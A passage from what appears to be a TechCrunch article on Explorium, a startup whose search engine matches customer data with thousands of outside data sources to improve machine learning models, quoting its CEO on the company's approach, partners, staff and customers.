CEO and co-founder, Maor Shlomo says that the company wanted to focus on the quality of the data because not much work has been done there. “A lot of work has been invested on the algorithmic part of machine learning, but the algorithms themselves have very much become commodities. The challenge now is really finding the right data to feed into those algorithms,” Sholmo told TechCrunch.

It’s a hard problem to solve, so they built a kind of search engine that can go out and find the best data wherever it happens to live, whether it’s internally or in an open data set, public data or premium databases. The company has partnered with thousands of data sources, according to Schlomo, to help data scientist customers find the best data for their particular model.

“We developed a new type of search engine that’s capable of looking at the customers data, connecting and enriching it with literally thousands of data sources, while automatically selecting what are the best pieces of data, and what are the best variables or features, which could actually generate the best performing machine learning model,” he explained.

Shlomo sees a big role for partnerships, whether that involves data sources or consulting firms, who can help push Explorium into more companies.

Explorium has 63 employees spread across offices in Tel Aviv, Kiev and San Francisco. It’s still early days, but Sholmo reports “tens of customers.” As more customers try to bring data science to their companies, especially with a shortage of data scientists, having a tool like Explorium could help fill that gap.